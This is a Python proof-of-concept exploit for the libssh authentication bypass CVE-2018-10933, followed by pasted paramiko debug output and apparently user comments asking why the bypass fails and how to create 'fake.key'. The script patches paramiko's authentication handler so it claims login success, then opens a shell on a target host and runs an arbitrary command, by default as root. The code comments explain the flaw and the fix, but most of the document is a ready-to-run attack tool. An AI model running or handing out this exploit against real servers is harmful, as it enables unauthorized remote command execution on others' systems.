#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Based on https://www.openwall.com/lists/oss-security/2018/08/16/1
# and on https://www.libssh.org/security/advisories/CVE-2018-10933.txt
# Original exploit code: https://gist.github.com/mlosapio/2062ebf943485a7289d226e0d00498e7
# References:
# https://qxf2.com/blog/ssh-using-python-paramiko/
# https://github.com/SoledaD208/CVE-2018-10933
# On OSX -> pip install paramiko==2.0.8
import socket, sys, time, argparse, logging, paramiko | |
# Process-wide monkeypatch of paramiko's AuthHandler message dispatch table.
# `_handler_table` is an underscore-prefixed internal; the header pins
# paramiko==2.0.8, which suggests this layout is version-sensitive.
# Step 1: keep a reference to the handler paramiko already registers for
# MSG_USERAUTH_SUCCESS.
new_auth_accept = paramiko.auth_handler.AuthHandler._handler_table[paramiko.common.MSG_USERAUTH_SUCCESS]


def auth_accept(*args, **kwargs):
    """Pass-through wrapper around paramiko's MSG_USERAUTH_SUCCESS handler.

    Every positional and keyword argument is forwarded unchanged and the
    handler's return value is returned as-is; the wrapper exists only so the
    table entry installed below is a distinct function object.
    """
    return new_auth_accept(*args, **kwargs)


# Step 2: register the wrapper under MSG_USERAUTH_REQUEST. Because the table is
# looked up on the class and mutated in place, every AuthHandler (and therefore
# every SSHClient) created in this interpreter afterwards is affected, not only
# the one built in main(). The underlying flaw is server-side in libssh (see the
# advisory in the header); the remediation is upgrading libssh to a release that
# advisory lists as fixed, and SSH servers not built on libssh are not affected.
paramiko.auth_handler.AuthHandler._handler_table.update({paramiko.common.MSG_USERAUTH_REQUEST: auth_accept,})
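def main(port=22, hostname="127.0.0.1", username="root", command="id"):
    """Open an SSH session with the patched paramiko client, run *command* in a shell and print the reply.

    Args:
        port: TCP port of the SSH service.
        hostname: host to connect to.
        username: login name sent in the authentication request.
        command: text written to the interactive shell, followed by CRLF.

    Every failure is reported on stdout instead of being raised, and the client
    is always closed in ``finally``. Paramiko's DEBUG-level log is sent to stderr,
    so the noisy transport output on stderr is expected, not an error.
    """
    # Bound before the try so the finally clause cannot raise NameError when
    # SSHClient() itself fails (the original closed an unbound name there).
    client = None
    try:
        logging.basicConfig(stream=sys.stderr, level=logging.DEBUG)
        client = paramiko.SSHClient()
        # WarningPolicy: an unknown host key is logged, not rejected.
        client.set_missing_host_key_policy(paramiko.WarningPolicy())
        # Empty password and a hard-coded key path, exactly as in the original PoC.
        client.connect(hostname, port=port, username=username, password="", pkey=None, key_filename="fake.key")
        channel = client.invoke_shell()
        channel.send(command + "\r\n")
        # Fixed wait for the shell to answer; nothing checks that it actually did.
        time.sleep(3)
        # Raw channel output, printed as received.
        print(channel.recv(9999))
    except paramiko.AuthenticationException:
        print("Authentication Bypass Failed.")
    except paramiko.SSHException as sshException:
        print("Could not establish SSH connection: %s" % sshException)
    except socket.timeout:
        print("Connection timed out.")
    except Exception as e:
        print("Exception in connecting to the server: ", e)
    finally:
        if client is not None:
            client.close()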
if __name__ == '__main__':
    # Command-line front end: three positional arguments plus an optional port,
    # handed to main() as keyword arguments (the argparse dest names match its
    # parameter names).
    parser = argparse.ArgumentParser(
        description="libssh Authentication Bypass (CVE-2018-10933)"
    )
    for _name, _help in (
        ('hostname', 'target IP or hostname'),
        ('username', 'username to bypass the login - usually root'),
        ('command', 'command to execute on the target'),
    ):
        parser.add_argument(_name, help=_help, type=str)
    parser.add_argument(
        '-p', '--port', type=int, default=22, help='ssh port (default: 22)'
    )
    args = parser.parse_args()
    main(**vars(args))
exec_command does not work.
DEBUG:paramiko.transport:Authentication type (publickey) not permitted.
DEBUG:paramiko.transport:Allowed methods: [u'password']
DEBUG:paramiko.transport:userauth is OK
INFO:paramiko.transport:Authentication (password) successful!
DEBUG:paramiko.transport:[chan 0] Max packet in: 32768 bytes
DEBUG:paramiko.transport:[chan 0] Max packet out: 35000 bytes
DEBUG:paramiko.transport:Secsh channel 0 opened.
DEBUG:paramiko.transport:[chan 0] EOF sent (0)
----> Could not establish SSH connection: Channel closed.
DEBUG:paramiko.transport:EOF in transport thread
I don't know why it always says "Authentication Bypass Failed". How do I generate "fake.key"?